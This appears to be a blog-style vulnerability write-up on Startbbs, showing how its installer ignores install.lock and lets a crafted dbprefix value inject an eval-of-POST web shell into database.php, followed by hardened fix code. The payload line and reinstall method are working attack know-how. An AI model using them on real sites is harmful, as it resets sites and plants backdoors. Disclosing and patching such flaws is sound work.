Open Source Light Forum Startbbs Front desk Getshell

Source: Internet
Author: User

I read the code on a whim. Startbbs has a clean interface and a small footprint, so I downloaded and installed it. After installation I noticed an extra file, install.lock, in the root directory. To prevent re-installation, most CMSs generate a file like this: the next time someone accesses the installation script, it checks for the file and, if the file is there, prompts "please delete it and then install". That should settle the matter. But look at how the installation script, /app/controllers/install.php, actually handles it:
```php
class Install extends install_controller
{
    function __construct()
    {
        parent::__construct();
        $this->load->library('MyClass');
        $file = FCPATH.'install.lock';
        if (file_exists($file)) {
            // Only emits JavaScript to the browser; nothing stops the request here
            $this->myclass->notice('alert("System has been installed"); window.location.href="'.site_url().'";');
        }
    }

    // step() and _install_do() follow below
}
```

I laughed when I saw this. The constructor checks whether install.lock exists and, if it does, uses JavaScript to tell the user that the system is already installed and to redirect them. But the script does not stop there: the other methods of this class still run, because sending a window.location.href to the browser does not halt execution on the server (and $this->myclass->notice() contains no code that stops execution either).

Scrolling down, we find the step function:

```php
public function step($step)
{
    $data['step'] = $step;
    if ($step == 1 || $step == 2) {
        $data['permission'] = $this->_checkfileright();
        $this->load->view('install', $data);
    }
    if ($step == 3) {
        $this->_install_do();   // still reachable when install.lock exists
    }
}

function _install_do()
{
    $data['step'] = 3;
    if ($_POST) {
        $dbhost     = $this->input->post('dbhost');
        $dbport     = $this->input->post('dbport');
        $dbname     = $this->input->post('dbname');
        $dbuser     = $this->input->post('dbuser');
        $dbpwd      = $this->input->post('dbpwd') ? $this->input->post('dbpwd') : '';
        $dbprefix   = $this->input->post('dbprefix');   // taken as-is, no validation
        $userid     = $this->input->post('admin');
        $pwd        = md5($this->input->post('pwd'));
        $email      = $this->input->post('email');
        $sub_folder = '/'.$this->input->post('base_url').'/';

        $conn = mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpwd);
        if (!$conn) {
            die('Unable to connect to the database server, please check that the user name and password are correct');
        }
        if ($this->input->post('creatdb')) {
            if (!@mysql_query('CREATE DATABASE IF NOT EXISTS '.$dbname)) {
                die('The specified database ('.$dbname.') could not be created, please create it by other means');
            }
        }
        if (!mysql_select_db($dbname, $conn)) {
            die($dbname.' database does not exist, please create it or check the database name.');
        }

        // The schema is loaded and the table prefix substituted by plain string replacement
        $sql = file_get_contents(FCPATH.'app/config/startbbs.sql');
        $sql = str_replace("sb_", $dbprefix, $sql);
        $explode = explode(";", $sql);
        $data['msg1'] = 'Create tables in '.$dbname.' succeeded, please wait ......<br/>';
        foreach ($explode as $key => $value) {
            if (!empty($value)) {
                if (trim($value)) {
                    mysql_query($value.";");   // query errors are ignored
                }
            }
        }

        $password = $pwd;
        $ip = $this->myclass->get_ip();
        $insert = "INSERT INTO ".$dbprefix."users (group_type,gid,is_active,username,password,email,regtime,ip) "
                ."VALUES ('0','1','1','".$userid."','".$password."','".$email."','".time()."','".$ip."')";
        mysql_query($insert);
        mysql_close($conn);
        $data['msg2'] = 'Installation complete, saving configuration file, please wait ...';

        // The configuration file is built by string concatenation; every value,
        // including $dbprefix, is placed between single quotes without escaping.
        $dbconfig = "<?php if (!defined('BASEPATH')) exit('No direct script access allowed');\n"
            ."\$active_group = 'default';\n"
            ."\$active_record = TRUE;\n"
            ."\$db['default']['hostname'] = '".$dbhost."';\n"
            ."\$db['default']['port'] = '".$dbport."';\n"
            ."\$db['default']['username'] = '".$dbuser."';\n"
            ."\$db['default']['password'] = '".$dbpwd."';\n"
            ."\$db['default']['database'] = '".$dbname."';\n"
            ."\$db['default']['dbdriver'] = 'mysql';\n"
            ."\$db['default']['dbprefix'] = '".$dbprefix."';\n"
            ."\$db['default']['pconnect'] = TRUE;\n"
            ."\$db['default']['db_debug'] = TRUE;\n"
            ."\$db['default']['cache_on'] = FALSE;\n"
            ."\$db['default']['cachedir'] = 'app/cache';\n"
            ."\$db['default']['char_set'] = 'utf8';\n"
            ."\$db['default']['dbcollat'] = 'utf8_general_ci';\n"
            ."\$db['default']['swap_pre'] = '';\n"
            ."\$db['default']['autoinit'] = TRUE;\n"
            ."\$db['default']['stricton'] = FALSE;";
        $file = FCPATH.'/app/config/database.php';
        file_put_contents($file, $dbconfig);   // Save config file

        if ($sub_folder) {
            $this->config->update('myconfig', 'sub_folder', $sub_folder);
        }
        $encryption_key = md5(uniqid());
        if ($encryption_key) {
            $this->config->update('myconfig', 'encryption_key', $encryption_key);
        }
        $data['msg3'] = 'Save config file complete!';
        touch(FCPATH.'install.lock');
        $data['msg4'] = 'Create lock installation file install.lock successful';
        $data['msg5'] = 'Installation of Startbbs successful!';
    }
    $this->load->view('install', $data);
}
```

When the step() parameter is 3, the installation function _install_do() is executed: it initialises the database and writes the database configuration file to /app/config/database.php. So we can craft a request that writes a one-line PHP shell directly into this configuration file.
This function reads a lot of POST data:

```php
$dbhost     = $this->input->post('dbhost');
$dbport     = $this->input->post('dbport');
$dbname     = $this->input->post('dbname');
$dbuser     = $this->input->post('dbuser');
$dbpwd      = $this->input->post('dbpwd') ? $this->input->post('dbpwd') : '';
$dbprefix   = $this->input->post('dbprefix');
$userid     = $this->input->post('admin');
$pwd        = md5($this->input->post('pwd'));
$email      = $this->input->post('email');
$sub_folder = '/'.$this->input->post('base_url').'/';
```

Of these, dbhost, dbport, dbname, dbuser and dbpwd cannot be written arbitrarily: with garbage values the installation simply fails. userid, pwd, email and sub_folder are written to the database, not to the configuration file. That leaves dbprefix, which we can construct like this:

dbprefix=sb_';@eval($_POST[101]);$xxx='

Because this reinstall vulnerability is so destructive (the site is reset after the getshell), I did not test it against a live site; the tests were done locally.
First, find an externally reachable MySQL account so that the installation can succeed.
I created a new account, test_db_user, on my VPS and then constructed the following packet to send:

After a short wait, the installation-success prompt came back. Since I was testing locally, I went to the site directory and opened /app/config/database.php:

As you can see, the one-line shell has been written. Connecting a webshell client (Caidao, the "kitchen knife") to index.php is enough; connecting directly to this database configuration file does not work.

Remediation

Add an exit after the notice in the constructor, so that the installer stops running as soon as install.lock exists.
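The fix written out, as an added example for this page and not code from the Startbbs project: the constructor stops after the notice, the table prefix is checked against an allow-list before it reaches either the SQL or the generated file, and database.php is rendered with var_export() so that every value is emitted as a properly quoted PHP literal. It assumes the CodeIgniter-style helpers seen above (FCPATH, $this->load, $this->myclass->notice(), site_url()).

```php
<?php
// Hardened installer pieces (added example; assumes the framework helpers above).
class Install extends install_controller
{
    public function __construct()
    {
        parent::__construct();
        $this->load->library('MyClass');
        if (file_exists(FCPATH.'install.lock')) {
            $this->myclass->notice('alert("System has been installed"); window.location.href="'.site_url().'";');
            // Stop here: without exit, step() and _install_do() stay reachable.
            exit;
        }
    }

    // The prefix is spliced into SQL and into generated PHP, so only a plain
    // identifier fragment is acceptable; everything else is rejected up front.
    private function validPrefix($prefix)
    {
        return (bool) preg_match('/^[A-Za-z0-9_]{1,20}$/', $prefix);
    }

    // Render database.php from an array of settings. var_export() quotes and
    // escapes strings and prints booleans as literals, so a value can never
    // break out of its own PHP literal.
    private function buildDbConfig(array $db)
    {
        $out  = "<?php if (!defined('BASEPATH')) exit('No direct script access allowed');\n";
        $out .= "\$active_group = 'default';\n\$active_record = TRUE;\n";
        foreach ($db as $key => $value) {
            $out .= "\$db['default']['".$key."'] = ".var_export($value, true).";\n";
        }
        return $out;
    }

    private function saveDbConfig(array $db)
    {
        if (!$this->validPrefix($db['dbprefix'])) {
            die('Invalid table prefix: only letters, digits and underscores are allowed');
        }
        file_put_contents(FCPATH.'/app/config/database.php', $this->buildDbConfig($db));
    }
}
```

With this in place the prefix from the write-up is refused by validPrefix(), and even a value that slipped past the allow-list would be written as a harmless quoted string rather than executable code.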
